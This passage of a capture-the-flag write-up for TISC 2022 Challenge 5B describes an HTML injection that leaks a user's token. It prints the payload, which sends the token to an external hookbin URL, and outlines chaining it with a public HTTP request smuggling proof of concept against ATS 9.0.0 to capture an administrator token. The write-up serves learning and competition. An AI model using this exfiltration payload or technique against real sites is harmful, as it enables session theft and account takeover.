ChesterSng/TISC2022/Challenge 5B.md

 Using `<img src="...` as payload.
 We can see that the second `img src` gets broken off.

 ![img src](./Images/Challenge5_6.png)

+Our *pathetic* loot from the server:

 ![returned payload](./Images/Challenge5_6_1.png)

 After experimenting many more payloads, the final payload looks like this.
 It looks like the HTML injection worked and we can steal the user's token.
 Now we just need to smuggle the request to this page to the backend server.

 ``"><img src="https://hookb.in/6J1enM3l90ToO0ro3Px9?steal=`
 ![img src success](./Images/Challenge5_7.png)

+We got our own token back, this means that if the administrator visits this page, we will get the administrator token.

 ![returned payload success](./Images/Challenge5_7_1.png)

 Now back to the HTTP request smuggling.
 After some extensive googling, an [HTTP request smuggling exploit](https://hackerone.com/reports/1238099) for ATS 9.0.0 looks promising.
 I downloaded the `poc.zip` and then used `payload2.py` to craft my payload.
 I first used hookbin as the URL so that I can check if the HTTP request smuggling succeeded, this particular python payload was able to return a request to my hookbin endpoint.